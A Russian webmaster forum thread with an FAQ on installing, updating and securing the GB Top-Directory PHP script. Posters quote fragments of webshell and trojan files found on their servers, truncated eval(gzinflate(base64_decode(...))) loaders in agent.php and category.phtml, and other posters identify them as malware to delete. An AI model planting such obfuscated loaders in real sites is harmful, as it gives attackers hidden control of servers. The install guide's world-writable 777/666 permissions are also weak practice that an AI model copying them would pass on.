Master-X
Форум | Новости | Статьи
Главная » Форум » Топы » 
Тема: F.A.Q по скрипту GB Top-Directory
цитата
22/12/10 в 00:02
 CrazyMen
В силу последних событий связаных с внедрением вебшелла в директрию с топом через дыру в скрипте, решил объеденить весь опыт рабты со скриптом - установка, настройка, безопасность.
Буду очень благодарен тем кто внесет свой посильный вклад в этот топик.

Какой адрес оффициального сайта разработчиков скрипта?
http://gbscript.com/

Есть ли форум поддержки у этого скрипта?
Да есть, http://forum.mavpa.com/

Где я могу скачать актуальную версию скрипта?
На декабрь 2010 года доступна версия GB Top-Directory 5.4. Скачать ее можно здесь http://gbscript.com/gbtop5.6.zip

Как правильно установить скрипт?
Скачиваем необходимую версию скрипта. Распаковываем у себя на диске и заливаем с помощью любого ftp клиента в папку на хосте где будет установлен ваш топ следующие папки и файлы из архива:

backupfiles
datafiles
memberfiles
templates
admin.php
calculate.php
config.php
countries.php
go.php
index.php
phpinfo.php
search.php
setup.php
skin.php
stat1.gif
stat2.gif
stat3.gif
stat4.gif
stat5.gif
webmasters.php

Выставляем права:
На корневую папку где расположены файлы скрипта, backupfiles, datafiles, memberfiles и templates выставляем права 777. На все что находится внутри папки templates ставим права 666.
На файл config.php установим chmod 666.
Остальные файлы оставляем без изменений (по умолчанию 644).

Далее необходимо произвести запуск файла setup.php непосредственно для установки скрипта:
-Заходим в браузер вводим урл http://DomenTopa.com/setup.php должно появится окно установки с полями:
URL - здесь собственно сам урл топа
Your email - ваше мыло
Your ICQ - ваша аська
Site name - название топа
Site Type - тип сайта топлист либо дериктория, оставляем по умолчанию
Site Mode - топ будет для веба либо вап трафика оставим по умолчанию в дальнейшем все настройки можно будет поменять.
Categories (lowercase without spaces) - если вы немерены использовать категории, например мультинишевый топ, то можете заране прописать их название по очередности как они должны распологатся, через запятую без пробелов. Если же не намерены использовать то оставляем как есть.
Password - здесь вводим пароль. ВНИМАНИЕ! По моему собственному опыту советую не использовать заглавные буквы т.к. при установке они почему то переводятся в нижний регистр, это было выялено на многих хостах. Используйте как можно более сложный пароль. Не меньше 12 символов содержащих буквы, цифры и другие символы.

Жмем "Create" и если все правильно видим примерно следующее
Цитата:

Your site is created

Main page: http://domentopa.com
Administration: http://domentopa.com/admin.php
Password:123456789

Write down this info


Переходим по ссылке http://domentopa.com/admin.php и вводим ваш пароль указанный при установке.
Зайдя в админку видим соообщение
Цитата:

Thank You !
Welcome to our community of experienced webmasters


Нажимаем кнопку "Update" для генерации морды. Видим: "Update Forced!". Жмем "Main Menu". Вышеприведенная надпись должна исчезнуть. Если нет то не правильно выставлены права на корневую директорию.

Вот и все первоначальая установка завершена!

Как обновить топ на более новую версию?
Скачиваем новую версию сркипта. Распаковываем архив. И заливаем в дерикторию где установлен ваш топ с заменой файлов. Должны быть залиты только эти файлы:

admin.php
calculate.php
countries.php
go.php
index.php
setup.php
skin.php
stat1.gif
stat2.gif
stat3.gif
stat4.gif
stat5.gif
webmasters.php
Далее заходим в админ панель топа вводим пароль и нажимаем кнопку "Update" для генерации морды. Видим: "Update Forced!". Жмем "Main Menu". Вышеприведенная надпись должна исчезнуть. Все обовление прошло успешно. Желательно заодно сменить пароль на новый. Проверьте удален ли файл setup.php после обновления. Если нет, то удалите вручную.

Последний раз редактировалось: CrazyMen (16/01/11 в 11:12), всего редактировалось 2 раз(а)
цитата
22/12/10 в 10:32
 Alexandur
phpinfo.php - не нужен
search.php - как правило, тоже
setup.php - после установки рекомендуется проверить существование, не всегда удаляется
admin.php - после установки лучше переименовать, безопасней будет

Ссылку на сам скрипт лучше не давать, завтра автор обновит, а ссылка останется, лучше на морду сайта.

Ну и восстановление пароля к GB Top-Directory
цитата
22/12/10 в 13:01
 salo
А еще надо установить блокировку доступа по ip на admin.php
Вопрос на засыпку, на какие файлы скрипта ГБ топ можно нужно установить блокировку по ip??
Еще бы ФАК кто-бы написал по борьбе с Вебшеллом.
CrazyMen отписал в личку
цитата
22/12/10 в 13:16
 salo
Если сайт (топы) хакнут, через php include, XSS или SQL Injection, и уже появился бекдор (веб шелл), то F.A.Q по скрипту GB Top-Directory не поможет, каждый день ты будешь удалять веб шелл с сервера и каждый день хакер будет наливать новые. Как нормальную защиту сделать хоста?
цитата
22/12/10 в 15:29
 Alexandur
Что должно быть:
backupfiles - .htaccess и файлы .dat
datafiles - файлы .dat и .txt + файл jsp.php
memberfiles - .htaccess и файлы .dat и .csv
templates - .htaccess и файлы .html
если что-то лишнее, это от лукавого.

Для поиска шеллов рекомендуют: http://www.clamav.net/lang/ru/about/
цитата
22/12/10 в 15:45
 Danyil
Счас глянул в datafiles кроме jsp.php есть ещё какой-то jsp.php.bkp.
А внутри такая хрень:
"<?$a=$_SERVER["HTTP_USER_AGENT"]."aaaaaaaaaa";
$jsum=abs(ord($a[0])*ord($a[1])+ord($a[2])+ord($a[3])-ord($a[4])
+ord($a[5])+ord($a[6])*ord($a[7])+ord($a[8])+ord($a[9]));?>"

Это враг?
цитата
22/12/10 в 15:52
 Danyil
На сабе в datafiles есть agent.php
Не должно быть никаких агентов?
цитата
22/12/10 в 15:57
 Danyil
Я опасаюсь что нить удалить не то, вдруг потом скрипт перестанет работать... icon_confused.gif
цитата
22/12/10 в 16:20
 Alexandur
jsp.php.bkp - судя по названию, возможно бекап. Кто-то уже чистил тебе топы?
Цитата:
На сабе в datafiles есть agent.php

Содержимое?
цитата
22/12/10 в 16:28
 Danyil
Саппорт проверял 19 числа, нашёл четыре файла, я их удалил...

Содержимое:
"<?php
//Authentication
$login = "admin"; //Login
$pass = ""; //Pass
$md5_pass = "af0209e610251d455a66efeb84087613"; //If no pass then hash

eval( gzinflate( base64_decode( "HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXefMcFUL5EXf/
yqceii7e8n9JvOYE9t8sT8cs//cfWUXldLpKsQ2LCH7EcnuYdrqeqDHEDz+
4uJYWH3YLflGUnDJ4..."
и дальше ещё очень много букв и цифр...
цитата
22/12/10 в 16:35
 Danyil
Правильно ли я понял, что нужно оставить папки:
backupfiles
datafiles
memberfiles
templates

Остальные можно смело удалить?
цитата
22/12/10 в 16:40
 Alexandur
Danyil писал:

Содержимое:
...
и дальше ещё очень много букв и цифр...

Оно самое. Удаляй.

Цитата:
Правильно ли я понял, что нужно оставить папки:

для гбтопа эти основные. Остальное - шаблоны для ВАП, скрипты для миграции с авторанка и др.
цитата
22/12/10 в 16:46
 Danyil
Любой agent.php надо удалять, или бывают нужные файлы такого типа?
цитата
22/12/10 в 17:43
 CrazyMen
Danyil: Удаляй! это тебе заинули опять если не уверен смотри код что там
цитата
22/12/10 в 18:41
 _4eburek
еще фак напишите что делать если уже вирусняк подкинули и установлена старая версия топа, что нужно сделать чтобы скрипт на топе обновить чтобы топ не поломался
цитата
22/12/10 в 21:28
 Alexandur
Danyil писал:
Любой agent.php надо удалять, или бывают нужные файлы такого типа?

agent.php в скрипте не предусмотрен, хотя шел этот можно обозвать как хочешь.
Выше я дал ссылку на clamav можно им половить.

_4eburek: как топ обновить - есть в документации.
цитата
23/12/10 в 23:36
 CrazyMen
Так хотелось бы знать права на корневую папку можно ли после первого запуска поменять на 744? И нужно ли закрывать от инденсакции какте то директории и файлы? аут ноутред траф слишком большой как исправить или забить?
цитата
24/12/10 в 15:57
 Alexandur
Цитата:
Так хотелось бы знать права на корневую папку можно ли после первого запуска поменять на 744?

На 755 можно.

Цитата:
И нужно ли закрывать от инденсакции какте то директории и файлы?

Что значит от индексации?

После установки и всех настроек, можно поставить 644 на config.php и все шаблоны. На папку шаблонов 744.
Правда, после переноса на другой сервер может возникнуть проблема с "владельцем" - chown.
http://forum.mavpa.com/topic_2_3248_0.html

Цитата:
аут ноутред траф слишком большой как исправить или забить?

Что это такое? auxout+noref? Я его не трогаю. Иногда проверяю, бывает - вебмастера неправильно ставят код, или я случайно кого-то удалил и его трафик идёт туда.
цитата
24/12/10 в 20:21
 CrazyMen
Что значит от индексации? Это robot.txt в нем прописать бедет ли полезно.
auxout+noref там траф у меня в основном от гугля на некоторых даже более 50% получается судя по линкам. А вот бывает что пишет неизветсно от кого и ставит свй процент может там в пустую страницу обращается?
цитата
27/12/10 в 12:00
 Alexandur
Да вроде, папки не индексируются, чего их закрывать? Тем более они хтаксесом закрыты.
цитата
16/01/11 в 09:02
 Alexandur
Не надо писать мне личных писем.

Danyil писал:
Привет.
Нашёл в папке templates такой файл - category.phtml
Внутри "<?php
eval( gzinflate( base64_decode( "HJ3HkqNQEkU/ZzqCBd4t8..."
В других templates такого файла нету. Это враг?

Да, это троян.
цитата
16/01/11 в 11:15
 CrazyMen
Тут же много раз gimcnuk: объяснял, что должно примерно содержаться в каждой папке, а чего быть не должно
цитата
16/01/11 в 11:29
 Дольчик ххх
Подскажите плиз по ГБ скрипту, Переименовал admin страницу на другое имя, но когда ко мне приходят на почту письма, указывается старый адресс: сайт/admin.php - где и что нужно покрутить чтоб в письме указывалась админ страница с новым переименованным именем? icon_wink.gif
цитата
16/01/11 в 12:20
 CrazyMen
Я сначало тоже так же поступил. НО потом все обратно переименовал. Так и обновлять проще и апрувить. Тем более, что пофиксили баги со скриптом.


Эта страница в полной версии